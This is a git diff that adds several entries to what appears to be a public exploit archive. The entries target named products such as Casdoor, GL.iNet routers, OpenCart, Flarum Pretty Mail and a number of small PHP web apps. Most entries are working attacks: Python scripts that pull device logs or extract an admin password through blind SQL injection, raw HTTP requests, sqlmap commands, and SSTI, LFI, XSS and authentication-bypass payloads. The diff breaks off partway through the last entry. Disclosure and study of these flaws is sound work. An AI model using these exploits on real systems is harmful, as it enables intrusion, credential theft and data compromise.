diff --git a/exploits/go/webapps/51961.txt b/exploits/go/webapps/51961.txt
new file mode 100644
index 000000000..3d322ff4c
--- /dev/null
+++ b/exploits/go/webapps/51961.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Casdoor < v1.331.0 - '/api/set-password' CSRF
+# Application: Casdoor
+# Version: <= 1.331.0
+# Date: 03/07/2024
+# Exploit Author: Van Lam Nguyen
+# Vendor Homepage: https://casdoor.org/
+# Software Link: https://github.com/casdoor/casdoor
+# Tested on: Windows
+# CVE : CVE-2023-34927
+
+Overview
+==================================================
+Casdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password.
+This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.
+
+Proof of Concept
+==================================================
+
+Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step
+
+
+
+
+
+
+
+If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials
+
+userOwner: built-in
+userName: admin
+newPassword: hacked
\ No newline at end of file
diff --git a/exploits/hardware/remote/51942.py b/exploits/hardware/remote/51942.py
new file mode 100755
index 000000000..a2d430a60
--- /dev/null
+++ b/exploits/hardware/remote/51942.py
@@ -0,0 +1,79 @@
+# Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download
+# CVE: CVE-2024-27356
+# Google Dork: intitle:"GL.iNet Admin Panel"
+# Date: 2/26/2024
+# Exploit Author: Bandar Alharbi (aggressor)
+# Vendor Homepage: www.gl-inet.com
+# Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin
+# Tested Model: GL-X3000 Spitz AX
+# Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md
+
+import sys
+import requests
+import json
+requests.packages.urllib3.disable_warnings()
+h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'}
+
+def DoesTarExist():
+ r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h)
+ if r.status_code == 200:
+ f = open("logread.tar", "wb")
+ f.write(r.content)
+ f.close()
+ print("[*] Full logs archive `logread.tar` has been downloaded!")
+ print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!")
+ return True
+ else:
+ print("[*] The `logread.tar` archive does not exist however ... try again later!")
+ return False
+
+def isVulnerable():
+ r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h)
+ if r1.status_code == 500 and "nginx" in r1.text:
+ r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h)
+ if "Admin-Token" in r2.text:
+ j = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]}
+ r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h)
+ ver = r3.json()['result']['firmware_version']
+ model = r3.json()['result']['model']
+ if ver.startswith(('4.')):
+ print("[*] Firmware version (%s) is vulnerable!" %ver)
+ print("[*] Device model is: %s" %model)
+ return True
+ print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!")
+ return False
+
+def isAlive():
+ try:
+ r = requests.get(url, verify=False, timeout=30, headers=h)
+ if r.status_code != 200:
+ print("[*] Make sure the target's web interface is accessible!")
+ return False
+ elif r.status_code == 200:
+ print("[*] The target is reachable!")
+ return True
+ except Exception:
+ print("[*] Error occurred when connecting to the target!")
+ pass
+ return False
+
+if __name__ == '__main__':
+ if len(sys.argv) != 2:
+ print("exploit.py url")
+ sys.exit(0)
+ url = sys.argv[1]
+ url = url.lower()
+ if not url.startswith(('http://', 'https://')):
+ print("[*] Invalid url format! It should be http[s]://")
+ sys.exit(0)
+ if url.endswith("/"):
+ url = url.rstrip("/")
+
+ print("[*] GL.iNet Unauthenticated Full Logs Downloader")
+
+ try:
+ if (isAlive() and isVulnerable()) == (True and True):
+ DoesTarExist()
+ except KeyboardInterrupt:
+ print("[*] The exploit has been stopped by the user!")
+ sys.exit(0)
\ No newline at end of file
diff --git a/exploits/php/webapps/51937.txt b/exploits/php/webapps/51937.txt
new file mode 100644
index 000000000..71563d21c
--- /dev/null
+++ b/exploits/php/webapps/51937.txt
@@ -0,0 +1,49 @@
+# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal
+# Date: 2024-03-06
+# Exploit Author: Ven3xy
+# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
+# Version: 2.7.10
+# Tested on: Linux
+
+import sys
+import requests
+from urllib.parse import urljoin
+import time
+
+def exploit(target_url, file_name, depth):
+ traversal = '../' * depth
+
+ exploit_url = urljoin(target_url, '/wp-admin/tools.php')
+ params = {
+ 'page': 'backup_manager',
+ 'download_backup_file': f'{traversal}{file_name}'
+ }
+
+ response = requests.get(exploit_url, params=params)
+
+ if response.status_code == 200 and response.headers.get('Content-Disposition') \
+ and 'attachment; filename' in response.headers['Content-Disposition'] \
+ and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0:
+ print(response.text) # Replace with the desired action for the downloaded content
+
+ file_path = f'simplebackup_{file_name}'
+ with open(file_path, 'wb') as file:
+ file.write(response.content)
+
+ print(f'File saved in: {file_path}')
+ else:
+ print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")
+
+if __name__ == "__main__":
+ if len(sys.argv) != 4:
+ print("Usage: python exploit.py ")
+ sys.exit(1)
+
+ target_url = sys.argv[1]
+ file_name = sys.argv[2]
+ depth = int(sys.argv[3])
+ print("\n[+] Exploit Coded By - Venexy || Simple Backup Plugin 2.7.10 EXPLOIT\n\n")
+ time.sleep(5)
+
+
+ exploit(target_url, file_name, depth)
\ No newline at end of file
diff --git a/exploits/php/webapps/51938.py b/exploits/php/webapps/51938.py
new file mode 100755
index 000000000..fe92103e0
--- /dev/null
+++ b/exploits/php/webapps/51938.py
@@ -0,0 +1,83 @@
+# Exploit Title: Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)
+# Google Dork: n/a
+# Date: 04/02/2024
+# Exploit Author: Gian Paris C. Agsam
+# Vendor Homepage: https://github.com/projectworldsofficial
+# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip
+# Version: 1.0
+# Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12
+# CVE : n/a
+
+import requests
+import argparse
+from colorama import (Fore as F, Back as B, Style as S)
+
+BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,FW = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT,F.WHITE
+
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
+
+parser = argparse.ArgumentParser(description='Exploit Blind SQL Injection')
+parser.add_argument('-u', '--url', help='')
+args = parser.parse_args()
+
+
+def banner():
+ print(f"""{FR}
+ ·▄▄▄·▄▄▄.▄▄ · ▄▄▄ . ▄▄· ·▄▄▄▄ ▄▄▄ ▪ ·▄▄▄▄
+▪ ▐▄▄·▐▄▄·▐█ ▀. ▀▄.▀·▐█ ▌▪██▪ ██ ▀▄ █·▪ ██ ██▪ ██
+ ▄█▀▄ ██▪ ██▪ ▄▀▀▀█▄▐▀▀▪▄██ ▄▄▐█· ▐█▌▐▀▀▄ ▄█▀▄ ▐█·▐█· ▐█▌
+▐█▌.▐▌██▌.██▌.▐█▄▪▐█▐█▄▄▌▐███▌██. ██ ▐█•█▌▐█▌.▐▌▐█▌██. ██
+ ▀█▄▀▪▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀ ·▀▀▀ ▀▀▀▀▀• .▀ ▀ ▀█▄▀▪▀▀▀▀▀▀▀▀•
+ Github: https://github.com/offensive-droid
+ {FW}
+ """)
+
+
+# Define the characters to test
+chars = [
+ 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',
+ 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D',
+ 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S',
+ 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7',
+ '8', '9', '@', '#'
+]
+
+def sqliPayload(char, position, userid, column, table):
+ sqli = 'admin\' UNION SELECT IF(SUBSTRING('
+ sqli += str(column) + ','
+ sqli += str(position) + ',1) = \''
+ sqli += str(char) + '\',sleep(3),null) FROM '
+ sqli += str(table) + ' WHERE uname="admin"\''
+ return sqli
+
+def postRequest(URL, sqliReq, char, position):
+ sqliURL = URL
+ params = {"emailusername": "admin", "password": sqliReq, "submit": "Login"}
+ req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies, timeout=10)
+ if req.elapsed.total_seconds() >= 2:
+ print("{} : {}".format(char, req.elapsed.total_seconds()))
+ return char
+
+ return ''
+
+def theHarvester(target, CHARS, url):
+ #print("Retrieving: {} {} {}".format(target['table'], target['column'], target['id']))
+ print("Retrieving admin password".format(target['table'], target['column'], target['id']))
+ position = 1
+ full_pass = ""
+ while position < 5:
+ for char in CHARS:
+ sqliReq = sqliPayload(char, position, target['id'], target['column'], target['table'])
+ found_char = postRequest(url, sqliReq, char, position)
+ full_pass += found_char
+ position += 1
+ return full_pass
+
+if __name__ == "__main__":
+ banner()
+ HOST = str(args.url)
+ PATH = HOST + "/hotel booking/admin/login.php"
+ adminPassword = {"id": "1", "table": "manager", "column": "upass"}
+ adminPass = theHarvester(adminPassword, chars, PATH)
+ print("Admin Password:", adminPass)
\ No newline at end of file
diff --git a/exploits/php/webapps/51940.txt b/exploits/php/webapps/51940.txt
new file mode 100644
index 000000000..87dc52536
--- /dev/null
+++ b/exploits/php/webapps/51940.txt
@@ -0,0 +1,23 @@
+# Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi
+# Date: 2024-04-2
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.opencart.com/
+# Software Link: https://github.com/opencart/opencart/releases
+# Version: 4.0.2.3
+# Tested on: XAMPP, Linux
+# Contact: https://twitter.com/dmaral3noz
+* Description :
+Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=.
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+* Steps to Reproduce :
+- Go to : http://127.0.0.1/index.php?route=product/search&search=test
+- New Use command Sqlmap : sqlmap -u "http://127.0.0.1/index.php?route=product/search&search=#1" --level=5 --risk=3 -p search --dbs
+===========
+Output :
+Parameter: search (GET)
+Type: boolean-based blind
+Title: AND boolean-based blind - WHERE or HAVING clause
+Payload: route=product/search&search=') AND 2427=2427-- drCa
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb
\ No newline at end of file
diff --git a/exploits/php/webapps/51943.txt b/exploits/php/webapps/51943.txt
new file mode 100644
index 000000000..c0a3435a2
--- /dev/null
+++ b/exploits/php/webapps/51943.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)
+# Date: 02/04/2024
+# Exploit Author: Sandeep Vishwakarma
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
+# Version: v1.0
+# Tested on: Windows 10
+# Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the logo Photos parameter in the web_crud.php component.
+# POC:
+1. Here we go to : http://127.0.0.1/fuelflow/index.php
+2. Now login with default username=mayuri.infospace@gmail.com and Password=admin
+3. Now go to "http://127.0.0.1/fuelflow/admin/web.php"
+4. Upload the san.php file in "Image" field
+5. Phpinfo will be present in "http://localhost/fuelflow/assets/images/phpinfo.php" page
+6. The content of san.php file is given below:
+
+# Reference:
+https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29410.md
\ No newline at end of file
diff --git a/exploits/php/webapps/51944.txt b/exploits/php/webapps/51944.txt
new file mode 100644
index 000000000..8bed04d15
--- /dev/null
+++ b/exploits/php/webapps/51944.txt
@@ -0,0 +1,20 @@
+# Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)
+# Google Dork: NA
+# Date: 28-03-2024
+# Exploit Author: Sandeep Vishwakarma
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link:https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html
+# Version: v1.0
+# Tested on: Windows 10
+# Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE -
+v1.0 allows an attacker to execute arbitrary code via a crafted payload to
+the Firstname and lastname parameter in the profile component.
+
+# POC:
+1. After login goto http://127.0.0.1/E-Insurance/Script/admin/?page=profile
+2. In fname & lname parameter add payolad
+">
+3. click on submit.
+
+# Reference:
+https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md
\ No newline at end of file
diff --git a/exploits/php/webapps/51945.txt b/exploits/php/webapps/51945.txt
new file mode 100644
index 000000000..8578a107a
--- /dev/null
+++ b/exploits/php/webapps/51945.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Hospital Management System v1.0 - Stored Cross Site Scripting (XSS)
+# Google Dork: NA
+# Date: 28-03-2024
+# Exploit Author: Sandeep Vishwakarma
+# Vendor Homepage: https://code-projects.org
+# Software Link: https://code-projects.org/hospital-management-system-in-php-css-javascript-and-mysql-free-download/
+# Version: v1.0
+# Tested on: Windows 10
+# CVE : CVE-2024-29412
+# Description: Stored Cross Site Scripting vulnerability in
+Hospital Management System - v1.0 allows an attacker to execute arbitrary
+code via a crafted payload to the 'patient_id',
+'first_name','middle_initial' ,'last_name'" in /receptionist.php component.
+
+# POC:
+1. Go to the User Login page: "
+http://localhost/HospitalManagementSystem-gh-pages/
+2. Login with "r1" ID which is redirected to "
+http://localhost/HospitalManagementSystem-gh-pages/receptionist.php"
+endpoint.
+3. In Patient information functionality add this payload
+"> ,in all parameter.
+4. click on submit.
+
+# Reference:
+https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29412.md
\ No newline at end of file
diff --git a/exploits/php/webapps/51947.txt b/exploits/php/webapps/51947.txt
new file mode 100644
index 000000000..24e10fba5
--- /dev/null
+++ b/exploits/php/webapps/51947.txt
@@ -0,0 +1,27 @@
+Exploit Title: FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI)
+Date: 03/28/2024
+Exploit Author: Chokri Hammedi
+Vendor Homepage: https://flarum.org/
+Software Link: https://github.com/FriendsOfFlarum/pretty-mail
+Version: 1.1.2
+Tested on: Windows XP
+CVE: N/A
+Description:
+
+The FoF Pretty Mail extension for Flarum is vulnerable to Local File Inclusion (LFI) due to the unsafe handling of file paths in the email template. An attacker with administrative access can exploit this vulnerability to include sensitive files from the server's file system in the email content, potentially leading to information disclosure.
+
+Steps to Reproduce:
+
+Log in as an administrator on the Flarum forum.
+
+Navigate to the FoF Pretty Mail extension settings.
+
+Edit the email default template and insert the following payload at the end of the template:
+
+{{ include('/etc/passwd') }}
+
+Save the changes to the email template.
+
+Trigger any action that sends an email, such as user registration or password reset.
+
+The recipient of the email will see the contents of the included file (in this case, /etc/passwd) in the email content.
\ No newline at end of file
diff --git a/exploits/php/webapps/51948.txt b/exploits/php/webapps/51948.txt
new file mode 100644
index 000000000..3bb77b552
--- /dev/null
+++ b/exploits/php/webapps/51948.txt
@@ -0,0 +1,28 @@
+Exploit Title: FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI)
+Date: 03/28/2024
+Exploit Author: Chokri Hammedi
+Vendor Homepage: https://flarum.org/
+Software Link: https://github.com/FriendsOfFlarum/pretty-mail
+Version: 1.1.2
+Tested on: Windows XP
+CVE: N/A
+Description:
+
+The FoF Pretty Mail extension for Flarum is vulnerable to Server-Side
+Template Injection (SSTI) due to the unsafe handling of template variables.
+An attacker with administrative access can inject malicious code into the
+email template, leading to arbitrary code execution on the server.
+
+Steps to Reproduce:
+
+- Log in as an administrator on the Flarum forum.
+- Navigate to the FoF Pretty Mail extension settings.
+- Edit the email default template and insert the following payload:
+
+{{ 7*7 }}
+{{ system('id') }}
+{{ system('echo "Take The Rose"') }}
+
+- Save the changes to the email template.
+- Trigger any action that sends an email, such as user registration or password reset.
+- The recipient of the email will see the result of the injected expressions (e.g., "49" for {{ 7*7 }}, the output of the id command for {{ system('id') }}, and the output of the echo "Take The Rose" command for {{ system('echo"Take The Rose"') }}) in the email content.
\ No newline at end of file
diff --git a/exploits/php/webapps/51949.txt b/exploits/php/webapps/51949.txt
new file mode 100644
index 000000000..cb05a862f
--- /dev/null
+++ b/exploits/php/webapps/51949.txt
@@ -0,0 +1,13 @@
+# Exploit Title: LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated)
+# Date: 2024-1-19
+# Exploit Author: tmrswrr
+# Category: Webapps
+# Vendor Homepage: https://www.lepton-cms.com/
+# Version : 7.0.0
+
+1 ) Login with admin cred > https://127.0.0.1/LEPTON/backend/login/index.php
+2 ) Go to Languages place > https://127.0.0.1/LEPTON/backend/languages/index.php
+3 ) Upload upgrade.php file in languages place >
+4 ) After click install you will be see result
+
+# Result : uid=1000(lepton) gid=1000(lepton) groups=1000(lepton) uid=1000(lepton) gid=1000(lepton) groups=1000(lepton)
\ No newline at end of file
diff --git a/exploits/php/webapps/51950.md b/exploits/php/webapps/51950.md
new file mode 100644
index 000000000..790d40dd7
--- /dev/null
+++ b/exploits/php/webapps/51950.md
@@ -0,0 +1,65 @@
+# Exploit Title: Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection
+# Date: 2 Feb 2024
+# Exploit Author: Yevhenii Butenko
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html
+# Version: 1.0
+# Tested on: Debian
+# CVE : CVE-2024-24499
+
+### SQL Injection:
+
+> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.
+
+### Affected Components:
+
+> /employee_akpoly/Admin/edit_profile.php
+
+> Two parameters `txtfullname` and `txtphone` within admin edit profile mechanism are vulnerable to SQL Injection.
+
+
+
+
+
+
+### Description:
+
+> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.
+
+## Proof of Concept:
+
+### SQLMap
+
+Save the following request to `edit_profile.txt`:
+
+```
+POST /employee_akpoly/Admin/edit_profile.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 88
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/employee_akpoly/Admin/edit_profile.php
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+txtfullname=Caroline+Bassey&txtphone=0905656&old_image=uploadImage%2Fbird.jpg&btnupdate=
+```
+
+Use `sqlmap` with `-r` option to exploit the vulnerability:
+
+```
+sqlmap -r edit_profile.txt --level 5 --risk 3 --batch --dbms MYSQL --dump
+```
+
+
+## Recommendations
+
+When using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
\ No newline at end of file
diff --git a/exploits/php/webapps/51951.md b/exploits/php/webapps/51951.md
new file mode 100644
index 000000000..2e620c40f
--- /dev/null
+++ b/exploits/php/webapps/51951.md
@@ -0,0 +1,88 @@
+# Exploit Title: Employee Management System 1.0 - `txtusername` and `txtpassword` SQL Injection (Admin Login)
+# Date: 2 Feb 2024
+# Exploit Author: Yevhenii Butenko
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html
+# Version: 1.0
+# Tested on: Debian
+# CVE : CVE-2024-24497
+
+### SQL Injection:
+
+> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.
+
+### Affected Components:
+
+> /employee_akpoly/Admin/login.php
+
+> Two parameters `txtusername` and `txtpassword` within admin login mechanism are vulnerable to SQL Injection.
+
+
+
+
+### Description:
+
+> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.
+
+## Proof of Concept:
+
+### Manual Exploitation
+
+The payload `' and 1=1-- -` can be used to bypass authentication within admin login page.
+
+```
+POST /employee_akpoly/Admin/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 61
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/employee_akpoly/Admin/login.php
+Cookie: PHPSESSID=lcb84k6drd2tepn90ehe7p9n20
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+txtusername=admin' and 1=1-- -&txtpassword=password&btnlogin=
+```
+
+### SQLMap
+
+Save the following request to `admin_login.txt`:
+
+```
+POST /employee_akpoly/Admin/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 62
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/employee_akpoly/Admin/login.php
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+txtusername=admin&txtpassword=password&btnlogin=
+```
+
+Use `sqlmap` with `-r` option to exploit the vulnerability:
+
+```
+sqlmap -r admin_login.txt --level 5 --risk 3 --batch --dbms MYSQL --dump
+```
+
+## Recommendations
+
+When using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
\ No newline at end of file
diff --git a/exploits/php/webapps/51952.md b/exploits/php/webapps/51952.md
new file mode 100644
index 000000000..22071abf6
--- /dev/null
+++ b/exploits/php/webapps/51952.md
@@ -0,0 +1,64 @@
+# Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)
+# Date: 2 Feb 2024
+# Exploit Author: Yevhenii Butenko
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
+# Version: 1.0
+# Tested on: Debian
+# CVE : CVE-2024-24494
+
+### Stored Cross-Site Scripting (XSS):
+
+> Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security.
+
+### Affected Components:
+
+> add-tracker.php, update-tracker.php
+
+Vulnerable parameters:
+- day
+- exercise
+- pray
+- read_book
+- vitamins
+- laundry
+- alcohol
+- meat
+
+### Description:
+
+> Multiple parameters within `Add Tracker` and `Update Tracker` requests are vulnerable to Stored Cross-Site Scripting. The application failed to sanitize user input while storing it to the database and reflecting back on the page.
+
+## Proof of Concept:
+
+The following payload `` can be used in order to exploit the vulnerability.
+
+Below is an example of a request demonstrating how a malicious payload can be stored within the `day` value:
+
+```
+POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 175
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/habit-tracker/home.php
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes
+```
+
+
+
+## Recommendations
+
+When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
\ No newline at end of file
diff --git a/exploits/php/webapps/51953.md b/exploits/php/webapps/51953.md
new file mode 100644
index 000000000..310f2a889
--- /dev/null
+++ b/exploits/php/webapps/51953.md
@@ -0,0 +1,74 @@
+# Exploit Title: Daily Habit Tracker 1.0 - SQL Injection
+# Date: 2 Feb 2024
+# Exploit Author: Yevhenii Butenko
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
+# Version: 1.0
+# Tested on: Debian
+# CVE : CVE-2024-24495
+
+### SQL Injection:
+
+> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.
+
+### Affected Components:
+
+> delete-tracker.php
+
+### Description:
+
+> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.
+
+## Proof of Concept:
+
+### Manual Exploitation
+
+The payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds:
+
+```
+GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+```
+
+
+
+### SQLMap
+
+Save the following request to `delete_tracker.txt`:
+
+```
+GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+```
+
+Use `sqlmap` with `-r` option to exploit the vulnerability:
+
+```
+sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump
+```
+
+## Recommendations
+
+When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
\ No newline at end of file
diff --git a/exploits/php/webapps/51954.md b/exploits/php/webapps/51954.md
new file mode 100644
index 000000000..fa1675415
--- /dev/null
+++ b/exploits/php/webapps/51954.md
@@ -0,0 +1,103 @@
+# Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control
+# Date: 2 Feb 2024
+# Exploit Author: Yevhenii Butenko
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
+# Version: 1.0
+# Tested on: Debian
+# CVE : CVE-2024-24496
+
+### Broken Access Control:
+
+> Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them.
+
+### Affected Components:
+
+> home.php, add-tracker.php, delete-tracker.php, update-tracker.php
+
+### Description:
+
+> Broken access control enables unauthenticated attackers to access the home page and to create, update, or delete trackers without providing credentials.
+
+## Proof of Concept:
+
+### Unauthenticated Access to Home page
+
+> To bypass authentication, navigate to 'http://yourwebsitehere.com/home.php'. The application does not verify whether the user is authenticated or authorized to access this page.
+
+### Create Tracker as Unauthenticated User
+
+To create a tracker, use the following request:
+
+```
